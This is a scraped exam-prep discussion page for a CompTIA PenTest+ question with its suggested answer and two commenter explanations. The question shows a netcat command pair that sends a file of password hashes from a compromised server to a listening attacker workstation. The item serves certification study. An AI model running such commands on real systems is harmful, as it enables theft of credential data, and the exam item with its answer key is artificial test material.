ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT0-002 All Questions

View all questions & answers for the PT0-002 exam
Go to Exam

Exam PT0-002 topic 1 question 383 discussion

Actual exam question from CompTIA's PT0-002
Question #: 383
Topic #: 1
[All PT0-002 Questions]

A penetration tester gets a shell on a server and runs the following command:

nc kaliworkstation 4444 < hashes.txt

The penetration tester runs the following command on a Kali workstation:

nc -nlvp 4444 > hashes.txt

Which of the following best describes what the penetration tester is attempting to do?

  • A. Exfiltrate a file from the server.
  • B. Obtain a higher privilege reverse shell.
  • C. Copy a file to the target server.
  • D. Delete a file from the Kali workstation.
Show Suggested Answer Hide Answer
Suggested Answer: A 🗳️
by NappyGamer at Sept. 21, 2024, 10:17 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
Ta2oo
7 months, 3 weeks ago
Selected Answer: A
Using netcat a connection is setup to the kaliworkstation over port 4444 with the contents of hashes.txt being redirected to this connection. The Kali machines is listening on port 4444 and redirects any contents received to a file called hashes.txt.
upvoted 2 times
...
NappyGamer
7 months, 3 weeks ago
Selected Answer: A
The penetration tester is using netcat to send the contents of hashes.txt from the compromised server to their Kali workstation. The command on the server is pushing the file's data to the listening Kali machine, effectively transferring (or exfiltrating) the file from the server to the attacker's system.
upvoted 2 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago